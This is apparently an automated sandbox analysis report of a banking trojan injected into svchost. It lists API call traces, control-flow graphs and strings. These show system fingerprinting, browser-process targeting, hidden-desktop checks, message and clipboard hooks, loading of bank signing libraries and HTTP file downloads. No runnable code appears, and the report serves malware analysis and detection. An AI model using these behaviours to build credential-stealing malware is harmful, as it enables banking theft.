                                                                                                                                                                                                                      • Part of subcall function 02C76FB0: lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C76FFE
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\opera.exe,00000000), ref: 02C86183
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,RtlFreeHeap,02C84010,02CC7D38), ref: 02C8619D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C861A0
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C861B4
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 02C861D1
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C861E0
                                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000,00000002,?,00000100,00000000), ref: 02C861F9
                                                                                                                                                                                                                    • GetUserObjectInformationA.USER32(00000000), ref: 02C86200
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C86216
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C7ACD0,00000000,00000000,00000000), ref: 02C8622A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8623E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8624B
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C77020,00000000,00000000,00000000), ref: 02C86260
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86274
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C86281
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Thread$CreateInformation$Close$AddressHeapProcProcess$Current$ModuleUsermemset$CriticalInitializeMutexPathSection$AdminBackslashCommandDesktopFileLibraryLineLoadNameObjectOpenQueryValueVolume_snprintflstrcmpi$AllocDirectoryEnvironmentExceptionFolderFreeHandlerSystemValidateVariableVectoredWindowslstrcpyn
                                                                                                                                                                                                                    • String ID: --no-sandbox$ --no-sandbox$80F500EBa$80F503A7a$80f507eba$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 558288730-518451523
                                                                                                                                                                                                                    • Opcode ID: 433a2c88ba9fa3a6621de861ef5f472e0328b5e2094a34a13b85b5ead02266c2
                                                                                                                                                                                                                    • Instruction ID: 853c4c066e2a5854523634396e0bfcaf0d9341f37bcf380c5529ae26b42d1a77
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 433a2c88ba9fa3a6621de861ef5f472e0328b5e2094a34a13b85b5ead02266c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F52E971E81355B6FB21E7A08D46FAE77AC9F84B48F618594F901B70C1DBF0DB048AA4

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 196 2c74920-2c74a59 CreateFileA 197 2c74fe4-2c74fe9 196->197 198 2c74a5f-2c74aca WriteFile * 3 GetModuleFileNameA WriteFile 196->198 199 2c74ad0-2c74ad5 198->199 199->199 200 2c74ad7-2c74b2a WriteFile * 2 GetUserNameA WriteFile 199->200 201 2c74b30-2c74b35 200->201 201->201 202 2c74b37-2c74b8d WriteFile * 2 GetEnvironmentVariableA WriteFile 201->202 203 2c74b90-2c74b95 202->203 203->203 204 2c74b97-2c74bdf WriteFile * 2 GetSystemDefaultLangID memset 203->204 205 2c74be1-2c74beb 204->205 206 2c74bf5-2c74c0b 205->206 207 2c74bed-2c74bf1 205->207 208 2c74c11-2c74c1a 206->208 207->205 209 2c74bf3 207->209 210 2c74c20-2c74c25 208->210 209->208 210->210 211 2c74c27-2c74c29 210->211 212 2c74c35-2c74c4d WriteFile 211->212 213 2c74c2b 211->213 214 2c74c50-2c74c55 212->214 213->212 214->214 215 2c74c57-2c74cd2 WriteFile * 2 GetDC GetDeviceCaps GetSystemMetrics * 2 _snprintf WriteFile 214->215 216 2c74cd5-2c74cda 215->216 216->216 217 2c74cdc-2c74d3c WriteFile * 2 GetDateFormatA WriteFile 216->217 218 2c74d40-2c74d45 217->218 218->218 219 2c74d47-2c74da4 WriteFile * 2 GetTimeFormatA WriteFile 218->219 220 2c74da7-2c74dac 219->220 220->220 221 2c74dae-2c74e5e WriteFile * 2 GetTimeZoneInformation _snprintf WriteFile 220->221 222 2c74e61-2c74e66 221->222 222->222 223 2c74e68-2c74ea9 WriteFile * 3 call 2c74070 222->223 226 2c74eb0-2c74eb5 223->226 226->226 227 2c74eb7-2c74f0d call 2c74070 WriteFile * 2 GetSystemWindowsDirectoryA WriteFile 226->227 230 2c74f10-2c74f15 227->230 230->230 231 2c74f17-2c74f5d WriteFile * 3 IsUserAnAdmin 230->231 232 2c74f64 231->232 233 2c74f5f 231->233 234 2c74f67-2c74f6c 232->234 233->232 234->234 235 2c74f6e-2c74f80 IsUserAnAdmin 234->235 236 2c74f87-2c74fbb WriteFile * 2 call 2c747e0 call 2c740f0 call 2c743e0 call 2c74630 235->236 237 2c74f82 235->237 245 2c74fc0-2c74fc6 236->245 237->236 245->197 246 2c74fc8-2c74fd5 GetHandleInformation 245->246 246->197 247 2c74fd7-2c74fdb 246->247 247->197 248 2c74fdd-2c74fde CloseHandle 247->248 248->197
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,75AF5CE0), ref: 02C74A4E
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02C73EFD,00000000,02CCB0C4), ref: 02C74A76
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,4.0.1,00000005,02C73EFD,00000000), ref: 02C74A88
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74A9A
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C74AA9
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Process: ,0000000A,02C73EFD,00000000), ref: 02C74ABF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74AEA
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74AFC
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,00000104), ref: 02C74B09
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Username: ,0000000B,02C73EFD,00000000), ref: 02C74B1F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74B4A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74B5C
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02C74B6F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,02C73EFD,00000000), ref: 02C74B85
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74BAA
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74BBC
                                                                                                                                                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 02C74BBE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C74BD7
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Language: ,0000000B,02C73EFD,00000000), ref: 02C74C45
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74C6A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74C7C
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 02C74C81
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 02C74C88
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 02C74C91
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 02C74C99
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C74CB1
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Screen: ,00000009,02C73EFD,00000000), ref: 02C74CCA
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74CEF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74D01
                                                                                                                                                                                                                    • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02C74D1B
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Date: ,00000007,02C73EFD,00000000), ref: 02C74D31
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74D5A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74D6C
                                                                                                                                                                                                                    • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02C74D86
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,02C73EFD,00000000), ref: 02C74D9C
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74DC1
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74DD3
                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNELBASE(?), ref: 02C74DDC
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C74E3D
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{GMT: ,00000006,02C73EFD,00000000), ref: 02C74E56
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74E7B
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74E8D
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,02C73EFD,00000000), ref: 02C74E9F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,02C73EFD,00000000), ref: 02C74ECF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74EE1
                                                                                                                                                                                                                    • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C74EEF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,?,00000000), ref: 02C74F05
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02C74F2A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74F3C
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,?,00000000), ref: 02C74F4E
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C74F50
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C74F73
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,true,02C73EFD,?,00000000), ref: 02C74F95
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74FA7
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,02C73EFD,00000000,00000000), ref: 02C74FCD
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C74FDE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Write$System$User$AdminFormatHandleInformationMetricsNameTime_snprintf$CapsCloseCreateDateDefaultDeviceDirectoryEnvironmentLangModuleVariableWindowsZonememset
                                                                                                                                                                                                                    • String ID: %c%d:%02d$%dx%d@%d$4.0.1$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                                    • API String ID: 113499719-3279427369
                                                                                                                                                                                                                    • Opcode ID: 9054499f4fa11f2e0f0240a636c2edd1570574cf3f9fc0559508981e89958fbe
                                                                                                                                                                                                                    • Instruction ID: b2fa6146e9022246d4178943fe94a64be024fc2ff43f79197264d154892d7f77
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9054499f4fa11f2e0f0240a636c2edd1570574cf3f9fc0559508981e89958fbe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D226DB1D40218FEEB16DFA4CC89EEEBB7DEF45700F10459AB246A7141E6B45B48CB60

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 249 2c844f0-2c84573 memset GetModuleFileNameA AddVectoredExceptionHandler CreateMutexA CreateThread 250 2c84598-2c845c3 InitializeCriticalSection call 2c81330 LoadLibraryExA 249->250 251 2c84575-2c84589 GetHandleInformation 249->251 256 2c845e1-2c845f0 LoadLibraryExA 250->256 257 2c845c5-2c845cf GetProcAddress 250->257 251->250 253 2c8458b-2c8458f 251->253 253->250 254 2c84591-2c84592 CloseHandle 253->254 254->250 259 2c845f2-2c845fc GetProcAddress 256->259 260 2c84646-2c8465a InitializeCriticalSection GetModuleHandleA 256->260 257->256 258 2c845d1-2c845dc call 2c88fc0 257->258 258->256 259->260 264 2c845fe-2c84618 call 2c88fc0 GetProcAddress 259->264 261 2c84678-2c84691 GetCurrentProcessId call 2c92e00 260->261 262 2c8465c-2c84666 GetProcAddress 260->262 271 2c846d2-2c846e3 LoadLibraryExA 261->271 272 2c84693-2c846b3 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 261->272 262->261 265 2c84668-2c84673 call 2c88fc0 262->265 264->260 273 2c8461a-2c84634 call 2c88fc0 GetProcAddress 264->273 265->261 276 2c84701-2c84707 GetCurrentProcessId call 2c92e00 271->276 277 2c846e5-2c846ef GetProcAddress 271->277 272->271 274 2c846b5-2c846c9 lstrcmpiA 272->274 273->260 285 2c84636-2c84641 call 2c88fc0 273->285 274->271 279 2c846cb-2c846d0 call 2c775b0 274->279 283 2c8470c-2c8470e 276->283 277->276 281 2c846f1-2c846fc call 2c88fc0 277->281 279->276 281->276 287 2c8474c-2c84750 283->287 288 2c84710-2c84730 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 283->288 285->260 291 2c848a3-2c848a9 287->291 292 2c84756-2c84776 call 2c882e0 call 2c71670 StrStrIA 287->292 288->287 290 2c84732-2c84746 lstrcmpiA 288->290 290->287 290->291 297 2c84778-2c84788 StrStrIA 292->297 298 2c8478e-2c847a3 LoadLibraryExA 292->298 297->291 297->298 
299 2c847f9-2c8482f InitializeCriticalSection call 2c80820 call 2c800b0 call 2c7eeb0 LoadLibraryExA 298->299 300 2c847a5-2c847af GetProcAddress 298->300 315 2c8484d-2c8485a LoadLibraryExA 299->315 316 2c84831-2c8483b GetProcAddress 299->316 302 2c847c1-2c847cb GetProcAddress 300->302 303 2c847b1-2c847bc call 2c88fc0 300->303 305 2c847dd-2c847e7 GetProcAddress 302->305 306 2c847cd-2c847d8 call 2c88fc0 302->306 303->302 305->299 309 2c847e9-2c847f4 call 2c88fc0 305->309 306->305 309->299 317 2c84878-2c84885 LoadLibraryExA 315->317 318 2c8485c-2c84866 GetProcAddress 315->318 316->315 319 2c8483d-2c84848 call 2c88fc0 316->319 317->291 322 2c84887-2c84891 GetProcAddress 317->322 318->317 321 2c84868-2c84873 call 2c88fc0 318->321 319->315 321->317 322->291 324 2c84893-2c8489e call 2c88fc0 322->324 324->291
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C84511
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7622F550,75AF7390,76230A60), ref: 02C84527
                                                                                                                                                                                                                    • AddVectoredExceptionHandler.KERNEL32(00000001,02C73940), ref: 02C84534
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C8454F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C84569
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C84581
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C84592
                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(02CBD870), ref: 02C845A3
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845B9
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02C845CB
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845EA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02C845F8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02C84614
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02C84630
                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(02CBD858), ref: 02C8464B
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02C84652
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02C84662
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,02C76A30,02CC7BA8), ref: 02C84678
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C84693
                                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C846A8
                                                                                                                                                                                                                    • GetUserObjectInformationA.USER32(00000000), ref: 02C846AF
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C846C1
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C846DB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02C846EB
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,02C7ABD0,02CBCC94), ref: 02C84701
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C84710
                                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C84725
                                                                                                                                                                                                                    • GetUserObjectInformationA.USER32(00000000), ref: 02C8472C
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C8473E
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,java), ref: 02C84772
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,.exe), ref: 02C84784
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02C8479D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02C847AB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02C847C7
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02C847E3
                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(02CBD840), ref: 02C847FE
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02C8482B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02C84837
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02C84856
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02C84862
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02C84881
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02C8488D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                                    • String ID: .exe$80f507eba$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                                    • API String ID: 1248150503-1245504843
                                                                                                                                                                                                                    • Opcode ID: 3e045128c3dfa6dc7d30af0499c5a6ae0fd0e9991d34ddc30372aca257b1a052
                                                                                                                                                                                                                    • Instruction ID: 30f4eea14a0cac2fd906ffe96af7effc306e659fab77b5ce78b910cc3d23f5b5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e045128c3dfa6dc7d30af0499c5a6ae0fd0e9991d34ddc30372aca257b1a052
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9591A071BC035676FA2677B09C4AF9A676D9F80F49F1186A0F502F3080DBA5E6018A79

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 372 2c839c0-2c83a05 memset 373 2c83a0b-2c83a0e 372->373 374 2c83d4d-2c83d4f 372->374 373->374 375 2c83a14-2c83a17 373->375 376 2c83d7f-2c83d87 374->376 377 2c83d51-2c83d71 call 2c83620 374->377 378 2c83a19-2c83a1b 375->378 379 2c83a71-2c83a8b InternetOpenA 375->379 383 2c83d76-2c83d7c 377->383 381 2c83a21-2c83a2f 378->381 379->374 382 2c83a91-2c83aac InternetConnectA 379->382 381->381 384 2c83a31-2c83a33 381->384 385 2c83ab2-2c83abb 382->385 386 2c83d43-2c83d4a InternetCloseHandle 382->386 387 2c83a40-2c83a51 384->387 388 2c83abd 385->388 389 2c83ac2-2c83ae2 HttpOpenRequestA 385->389 386->374 390 2c83a53 387->390 391 2c83a55-2c83a5c 387->391 388->389 392 2c83ae8-2c83af6 389->392 393 2c83d39-2c83d40 InternetCloseHandle 389->393 390->391 391->387 394 2c83a5e-2c83a6c call 2c86c40 391->394 395 2c83af8-2c83afc 392->395 396 2c83b0d-2c83b20 HttpAddRequestHeadersA 392->396 393->386 394->379 395->396 400 2c83afe-2c83b0b HttpAddRequestHeadersA 395->400 397 2c83b52-2c83b67 HttpSendRequestA 396->397 398 2c83b22-2c83b50 _snprintf HttpAddRequestHeadersA 396->398 401 2c83d2c-2c83d36 InternetCloseHandle 397->401 402 2c83b6d-2c83b87 HttpQueryInfoA 397->402 398->397 400->396 401->393 402->401 403 2c83b8d-2c83b94 402->403 403->401 404 2c83b9a-2c83bbe CreateFileA 403->404 404->401 405 2c83bc4-2c83bca 404->405 406 2c83bd0-2c83be4 GetProcessHeap RtlAllocateHeap 405->406 407 2c83bea-2c83c17 memset InternetReadFile 406->407 408 2c83c73-2c83c75 406->408 411 2c83c19-2c83c1e 407->411 412 2c83c57-2c83c65 GetProcessHeap HeapValidate 407->412 409 2c83c9a-2c83cac call 2c76570 408->409 410 2c83c77-2c83c8b GetHandleInformation 408->410 420 2c83d29 409->420 421 2c83cb2-2c83cbc 409->421 410->409 414 2c83c8d-2c83c91 410->414 411->412 416 2c83c20-2c83c44 WriteFile 
GetProcessHeap HeapValidate 411->416 412->408 413 2c83c67-2c83c6d GetProcessHeap HeapFree 412->413 413->408 414->409 417 2c83c93-2c83c94 CloseHandle 414->417 416->406 419 2c83c46-2c83c52 GetProcessHeap HeapFree 416->419 417->409 419->406 420->401 422 2c83cc0-2c83cce 421->422 422->422 423 2c83cd0 422->423 424 2c83cd2-2c83ce3 423->424 425 2c83ce5 424->425 426 2c83ce7-2c83cee 424->426 425->426 426->424 427 2c83cf0-2c83d08 call 2c86c40 call 2c764d0 426->427 431 2c83d0d-2c83d1b GetProcessHeap HeapValidate 427->431 431->420 432 2c83d1d-2c83d23 GetProcessHeap HeapFree 431->432 432->420
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C839F2
                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83B0B
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83B1A
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C83B38
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C83B50
                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,02C76406,?), ref: 02C83B5F
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,?), ref: 02C83B7F
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83BB3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83BD7
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C83BDA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83BF2
                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02C83C0F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C83C30
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C39
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83C3C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C49
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C83C4C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C5A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C83C5D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C6A
